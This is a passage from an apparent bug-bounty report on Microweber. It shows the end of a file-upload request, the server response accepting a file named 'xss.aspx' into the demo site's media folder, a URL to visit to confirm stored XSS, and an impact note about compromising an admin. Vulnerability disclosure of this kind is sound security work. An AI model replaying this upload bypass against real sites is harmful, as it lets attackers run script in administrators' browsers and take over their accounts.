    IEND®B`
    ------WebKitFormBoundary7ACkSBriVfqdfw4D--
    
    

The response:

    HTTP/1.1 200 OK
    Date: Wed, 09 Mar 2022 14:26:01 GMT
    Server: Apache
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Last-Modified: Wed, 09 Mar 2022 14:26:01 GMT
    Connection: close
    Content-Type: application/json
    Content-Length: 123
    
    {"src":"https:\/\/demo.microweber.org\/demo\/userfiles\/media\/default\/xss.aspx","name":"xss.aspx","bytes_uploaded":"533"}
    

![request-response](https://bu.gbounty.cc/5b2b391d35fd687ff6bebe0bd3ac2b40/request-response.png)

*   Visit `https://demo.microweber.org/demo/userfiles/media/default/xss.aspx` to confirm the XSS.

![XSS](https://bu.gbounty.cc/5b2b391d35fd687ff6bebe0bd3ac2b40/XSS.png)

**Impact**

If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user, in this case, an admin.

Tag

#apple